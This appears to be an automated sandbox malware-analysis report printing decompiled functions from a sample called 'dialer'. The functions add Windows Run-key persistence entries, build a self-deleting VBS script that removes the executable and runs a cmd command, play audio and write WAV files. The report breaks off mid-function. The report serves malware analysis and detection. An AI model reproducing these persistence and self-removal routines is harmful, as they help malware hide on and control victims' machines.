Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
API String ID: 2645874385-232273909
Opcode ID: 000e77ad3a4b68f1b65fdd9cf93c06e27b4433b195a74a56e8cefade3b9146bf
Instruction ID: 39908bf11b75da137bed33461dc6f1560e7a678cbeca7b59d94bc4d120dac13a
Opcode Fuzzy Hash: 000e77ad3a4b68f1b65fdd9cf93c06e27b4433b195a74a56e8cefade3b9146bf
Instruction Fuzzy Hash: FF51F571A003197BDB10ABA09C49EFF336C9B04755F10007BB501A32E2EF788E498B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B465, Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 280
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B465(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				E0040FB4B();
				if( *0x46a9d4 != 0x30) {
					E00409D75();
				}
				_t243 =  *0x46bd6b - 1; // 0x0
				if(_t243 == 0) {
					L00414D1D(_t243);
				}
				if( *0x46ba75 != 0) {
					E004170AC(L00401ECB(0x46c0e0));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x46bb06 - 1; // 0x0
				if(_t245 == 0) {
					E0041074C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401ECB(0x46c4e8));
				}
				_t246 =  *0x46baff - 1; // 0x0
				if(_t246 == 0) {
					E0041074C(0x80000002, _t231, L00401ECB(0x46c4e8));
				}
				_t247 =  *0x46bb04 - 1; // 0x0
				if(_t247 == 0) {
					E0041074C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401ECB(0x46c4e8));
				}
				_t53 = E00402469();
				_t54 = L00401F75(0x46c560);
				_t57 = E00410420(L00401F75(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F75(0x46c518));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x46c530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E004074E6(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46c530;
					SetFileAttributesW(L00401ECB(0x46c530), 0x80);
				}
				E00403086(_t134,  &_v124, E0040425F(_t134,  &_v52, E0043918F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				L00401ED0();
				E004043E5(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040425F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401ED0();
				_t250 = _t134;
				if(_t134 != 0) {
					E004032F1(E00403086(_t134,  &_v52, E004043E5(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040425F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
				}
				E004032F1(E00403086(_t134,  &_v100, E00403086(_t134,  &_v76, E0040425F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t251 = _t134;
				if(_t134 != 0) {
					E0040766E(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E004074E6(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E004032F1(E00403086(0x45f714,  &_v100, L00409E6B( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
					L00401ED0();
					L00401ED0();
				}
				_t79 = E0040425F(0x45f714,  &_v172, L"\"\"\", 0");
				E004032F1(E00403086(0x45f714,  &_v100, E00403010( &_v76, E00404409(0x45f714,  &_v52, E0040425F(0x45f714,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				E0040766E(0x45f714,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = L00401ECB( &_v124);
				_t93 = E00402469();
				if(E0041729F(L00401ECB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401ECB( &_v124), 0x45f714, 0x45f714, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401ED0();
				L00401ED0();
				return L00401ED0();
			}

0x0040b471
0x0040b47d
0x0040b47f
0x0040b47f
0x0040b487
0x0040b48d
0x0040b48f
0x0040b48f
0x0040b49b
0x0040b4a9
0x0040b4a9
0x0040b4b3
0x0040b4b8
0x0040b4be
0x0040b4cf
0x0040b4d4
0x0040b4d5
0x0040b4db
0x0040b4ec
0x0040b4f1
0x0040b4f2
0x0040b4f8
0x0040b50c
0x0040b511
0x0040b519
0x0040b521
0x0040b547
0x0040b551
0x0040b553
0x0040b55e
0x0040b55e
0x0040b571
0x0040b589
0x0040b594
0x0040b599
0x0040b59b
0x0040b59e
0x0040b5a3
0x0040b5a5
0x0040b5ac
0x0040b5b7
0x0040b5b7
0x0040b5d7
0x0040b5e0
0x0040b5fb
0x0040b604
0x0040b609
0x0040b60b
0x0040b63f
0x0040b647
0x0040b64f
0x0040b657
0x0040b657
0x0040b68f
0x0040b697
0x0040b69f
0x0040b6a7
0x0040b6ac
0x0040b6ae
0x0040b6b8
0x0040b6b8
0x0040b6cb
0x0040b6d0
0x0040b6d2
0x0040b6f7
0x0040b6ff
0x0040b707
0x0040b707
0x0040b71c
0x0040b75b
0x0040b763
0x0040b76b
0x0040b773
0x0040b77e
0x0040b789
0x0040b796
0x0040b79f
0x0040b7a8
0x0040b7c6
0x0040b7e6
0x0040b7e6
0x0040b7ef
0x0040b7f7
0x0040b80a

APIs

Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,?,0040B118), ref: 0040FB5B
Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF,?,0040B118), ref: 0040FB6E

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B55E
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B571
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B589
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B5B7

Part of subcall function 00409D75: TerminateThread.KERNEL32(0040884D,00000000,?,0040B126), ref: 00409D84
Part of subcall function 00409D75: UnhookWindowsHookEx.USER32(00000000), ref: 00409D94
Part of subcall function 00409D75: TerminateThread.KERNEL32(Function_00008832,00000000,?,0040B126), ref: 00409DA6

Part of subcall function 0041729F: CreateFileW.KERNEL32(00405D1C,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,004173C9,00000000,00000000), ref: 004172DE

ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B7DA
ExitProcess.KERNEL32 ref: 0040B7E6

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040B502
wend, xrefs: 0040B6B0
fso.DeleteFolder ", xrefs: 0040B6DA
fso.DeleteFile ", xrefs: 0040B668
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040B4B3
""", 0, xrefs: 0040B711
On Error Resume Next, xrefs: 0040B5F3
Temp, xrefs: 0040B5BE
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B726
open, xrefs: 0040B7D4
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B78E
while fso.FileExists(", xrefs: 0040B622
exepath, xrefs: 0040B539
"), xrefs: 0040B60D
\update.vbs, xrefs: 0040B5B9
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040B5E5

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-1536747724
Opcode ID: f8555620d053e2ba0ee88039e02dcc354c2519fc645e296044691fa67c3c0157
Instruction ID: cb4c9db422e66655c9b91f3ac858345e6386e01706fd0e6f849a483e47031bcc
Opcode Fuzzy Hash: f8555620d053e2ba0ee88039e02dcc354c2519fc645e296044691fa67c3c0157
Instruction Fuzzy Hash: 9891B131A101186ACB14FB62DCA69EF7769AF50348F14007FF406731E2EF781E4A869E

Uniqueness

Uniqueness Score: -1.00%

Function 0041636B, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041636B(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(E004165B1( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = L00401ECB( &_a4);
					_t103 = 0x30;
					L00401EDA( &_a4, 0x30, _t111, E004179B3( &_v28, 0x30, _t63));
					L00401ED0();
				}
				_t25 = E00402469();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(L00401ECB( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402064(_t67, _t114 - 0x18, 0x45f6ac);
						_push(0xa8);
						E00404A6E(_t67, 0x46ca00, _t103, __eflags);
					}
				} else {
					_t60 = L00401ECB( &_a4);
					_t118 = _t114 - 0x18;
					E004020CC(_t67, _t118, _t103, _t120, _t109);
					E004173A6(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = E00416C32( &_v124, _t67);
					_t108 = E00403010( &_v28, E00403086(_t67,  &_v76, L00409E6B( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E00403086(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					L00401ED0();
					L00401ED0();
					L00401ED0();
					L00401ED0();
					mciSendStringW(L00401ECB( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402064(0, _t114 - 0x18, 0x45f6ac);
					_push(0xa9);
					E00404A6E(0, 0x46ca00, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46bea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46bea6; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46bea6 = 0;
							}
							__eflags =  *0x46bea5; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46bea5 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46bea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46bea8; // 0x0
							} else {
								CloseHandle( *0x46bea8);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402064(0, _t115 - 0x18, 0x45f6ac);
						_push(0xaa);
						E00404A6E(0, 0x46ca00, _t108, _t122);
						L00401ED0();
						goto L21;
					}
				}
				L21:
				return L00401ED0();
			}

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416450
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416464
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6AC), ref: 00416489
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 0041649F
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 004164E0
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 004164F8
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041650C
SetEvent.KERNEL32 ref: 0041652D
WaitForSingleObject.KERNEL32(000001F4), ref: 0041653E
CloseHandle.KERNEL32 ref: 0041654E
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416570
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041657A

Strings

open ", xrefs: 004163ED
stop audio, xrefs: 0041656B
resume audio, xrefs: 004164F3
pause audio, xrefs: 004164DB
stopped, xrefs: 00416511
play audio, xrefs: 0041645F
close audio, xrefs: 00416575
status audio mode, xrefs: 00416507
" type , xrefs: 004163F2
alias audio, xrefs: 004163DA

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-1354618412
Opcode ID: 25cfce673dce31bed8baf2ba1d29a164df51879723e29213e1e10257fff3c748
Instruction ID: c8fb6d8f14581896d3eba004d9fbc9f1a09e24d5ac4ccc55cdd35aae18883956
Opcode Fuzzy Hash: 25cfce673dce31bed8baf2ba1d29a164df51879723e29213e1e10257fff3c748
Instruction Fuzzy Hash: 4C51B4716002087AD714BB75DC96DFF3A6DDA50389F14003FF501A61E2EE788E8586AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040B107, Relevance: 35.3, APIs: 6, Strings: 14, Instructions: 259
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B107() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t231;

				E0040FB4B();
				if( *0x46a9d4 != 0x30) {
					E00409D75();
				}
				_t227 =  *0x46bd6b - 1; // 0x0
				if(_t227 == 0) {
					L00414D1D(_t227);
				}
				if( *0x46ba75 != 0) {
					E004170AC(L00401ECB(0x46c0e0));
				}
				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t229 =  *0x46bb06 - 1; // 0x0
				if(_t229 == 0) {
					E0041074C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401ECB(0x46c4e8));
				}
				_t230 =  *0x46baff - 1; // 0x0
				if(_t230 == 0) {
					E0041074C(0x80000002, _t214, L00401ECB(0x46c4e8));
				}
				_t231 =  *0x46bb04 - 1; // 0x0
				if(_t231 == 0) {
					E0041074C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401ECB(0x46c4e8));
				}
				E00431810(0,  &_v668, 0, 0x208);
				_t49 = E00402469();
				_t50 = L00401F75(0x46c560);
				_t53 = E00410420(L00401F75(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49);
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F75(0x46c518));
				_t56 = E004074E6(_t232);
				_t233 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(L00401ECB(0x46c530), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
				asm("sbb bl, bl");
				E00403086(_t123,  &_v148, E00416C32( &_v76, E004169EB( &_v28)), 0, _t233, L".vbs");
				L00401ED0();
				L00401FA7();
				E00404409(_t123,  &_v124, E00403086(_t123,  &_v28, E0040425F(_t123,  &_v76, E0043918F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
				L00401ED0();
				L00401ED0();
				E004043E5(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040425F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401ED0();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E004032F1(E00403086(_t124,  &_v28, E004043E5(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040425F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
				}
				E004032F1(E00403086(_t124,  &_v100, E00403086(_t124,  &_v28, E0040425F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t235 = _t124;
				if(_t124 != 0) {
					E0040766E(_t124,  &_v52, 0, L"wend\n");
				}
				_t82 = E004074E6(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E004032F1(E00403086(0x45f714,  &_v100, L00409E6B( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
					L00401ED0();
					L00401ED0();
				}
				E0040766E(0x45f714,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = L00401ECB( &_v124);
				_t85 = E00402469();
				if(E0041729F(L00401ECB( &_v52), _t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", L00401ECB( &_v124), 0x45f714, 0x45f714, 0);
				}
				ExitProcess(0);
			}

0x0040b113
0x0040b11f
0x0040b121
0x0040b121
0x0040b129
0x0040b12f
0x0040b131
0x0040b131
0x0040b13d
0x0040b14b
0x0040b14b
0x0040b155
0x0040b15a
0x0040b160
0x0040b171
0x0040b176
0x0040b177
0x0040b17d
0x0040b18e
0x0040b193
0x0040b194
0x0040b19a
0x0040b1ae
0x0040b1b3
0x0040b1c4
0x0040b1d3
0x0040b1db
0x0040b1fc
0x0040b204
0x0040b206
0x0040b211
0x0040b211
0x0040b224
0x0040b236
0x0040b241
0x0040b243
0x0040b252
0x0040b252
0x0040b267
0x0040b26e
0x0040b287
0x0040b290
0x0040b298
0x0040b2cd
0x0040b2d6
0x0040b2de
0x0040b2f9
0x0040b302
0x0040b307
0x0040b307
0x0040b30a
0x0040b33e
0x0040b346
0x0040b34e
0x0040b356
0x0040b356
0x0040b38e
0x0040b396
0x0040b39e
0x0040b3a6
0x0040b3ab
0x0040b3ad
0x0040b3b7
0x0040b3b7
0x0040b3ca
0x0040b3cf
0x0040b3d1
0x0040b3f6
0x0040b3fe
0x0040b406
0x0040b406
0x0040b413
0x0040b41c
0x0040b425
0x0040b443
0x0040b457
0x0040b457
0x0040b45e

APIs

Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,?,0040B118), ref: 0040FB5B
Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF,?,0040B118), ref: 0040FB6E

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B211
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B224
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B252
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B260

Part of subcall function 00409D75: TerminateThread.KERNEL32(0040884D,00000000,?,0040B126), ref: 00409D84
Part of subcall function 00409D75: UnhookWindowsHookEx.USER32(00000000), ref: 00409D94
Part of subcall function 00409D75: TerminateThread.KERNEL32(Function_00008832,00000000,?,0040B126), ref: 00409DA6

ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B457
ExitProcess.KERNEL32 ref: 0040B45E

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040B1A4
wend, xrefs: 0040B3AF
fso.DeleteFolder ", xrefs: 0040B3D9
fso.DeleteFile ", xrefs: 0040B367
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040B155
On Error Resume Next, xrefs: 0040B2F1
Temp, xrefs: 0040B2A9
open, xrefs: 0040B451
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B40B
.vbs, xrefs: 0040B269
while fso.FileExists(", xrefs: 0040B321
exepath, xrefs: 0040B1EE
"), xrefs: 0040B30C
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040B2E3

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 3659626935-2802769051
Opcode ID: 847bee91743045f3007174e1e95ac693254bb67ba72c4d55a7afc5f21e8df2f8
Instruction ID: 1fdbb4419d14362d38d1ed4744bf8d6dc0aba1f6708a8cbb9b41b7a1a16d8b70
Opcode Fuzzy Hash: 847bee91743045f3007174e1e95ac693254bb67ba72c4d55a7afc5f21e8df2f8
Instruction Fuzzy Hash: 86819D31A101086ACB14F7A2DCA69EF77699F50748F14003FF506772E2EE785E8A869D

Uniqueness

Uniqueness Score: -1.00%

Function 00401A44, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 155
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401A44(WCHAR* __ecx, signed int __edx) {
				long _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				void _v32;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x46ba9a & 0x0000ffff;
				_t83 = ( *0x46baa6 & 0x0000ffff) * _t80;
				_v20 = 1;
				_v16 = 0x10;
				_v24 = _t83 *  *0x46ba9c >> 3;
				asm("cdq");
				_v28 = _t83 + (__edx & 0x00000007) >> 3;
				_t36 =  *(__edx + 4) * _t80;
				_v32 = _t36;
				_v12 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9a, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9c, 4,  &_v8, 0);
					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
					WriteFile(_t81, 0x46baa6, 2,  &_v8, 0);
					WriteFile(_t81, "data", 4,  &_v8, 0);
					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AAC
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AD3
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AE2
WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF2
WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B02
WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B11
WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B20
WriteFile.KERNEL32(00000000,0046BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B30
WriteFile.KERNEL32(00000000,0046BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B40
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B4F
WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B5E
WriteFile.KERNEL32(00000000,0046BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B6E
WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B7E
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B8D

Strings

WAVE, xrefs: 00401AEC
fmt , xrefs: 00401AFC
RIFF, xrefs: 00401ACD
data, xrefs: 00401B78

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 422b5d87e93fc4075c6ec35830616d194da27f1ddb5db7f37ea2b3f51acf71b2
Instruction ID: b5e00df74bb3e46237e128d7157f8ec2d4ab39d7b9d0c44a05e459c2c922e607
Opcode Fuzzy Hash: 422b5d87e93fc4075c6ec35830616d194da27f1ddb5db7f37ea2b3f51acf71b2
Instruction Fuzzy Hash: B8413EB5A50218BAE710DA91CC86FFF7BBCDB45B50F500066F704EA0C0D7B45A05DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0044625D, Relevance: 27.4, APIs: 18, Instructions: 419
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0044625D(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
